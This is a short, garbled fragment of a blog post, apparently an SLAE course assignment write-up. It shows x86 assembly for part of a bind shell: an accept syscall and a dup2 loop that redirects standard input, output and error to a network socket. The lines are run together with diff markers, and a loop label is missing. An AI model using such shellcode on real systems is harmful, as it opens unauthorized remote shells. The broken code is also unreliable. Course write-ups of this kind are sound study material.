h3ll0clar1c3/h3ll0clar1c3.github.io/_posts/2020-06-11-SLAE_Assignment_1.md

 	int 0x80	; call the interrupt to execute accept syscall xor edi, edi    ; zeroize socket value stored in edi mov edi, eax    ; save return value from eax into edi

+	; 5th syscall - duplicate file descriptors for STDIN, STDOUT and STDERR mov cl, 0x3     ; move 3 in the counter loop (stdin, stdout, stderr)
+ 	xor eax, eax
+   	mov al, 0x3f    ; move the dup2 syscall code into the lower part of eax mov ebx, edi    ; move the new int sockfd (stored in edi) into ebx dec cl          ; decrement cl by 1 int 0x80	; call interrupt to execute dup2 syscall
+    	jnz loop_dup2   ; jump back to the top of loop_dup2 if the zero flag is not set
 ````

 ##### SLAE Disclaimer ####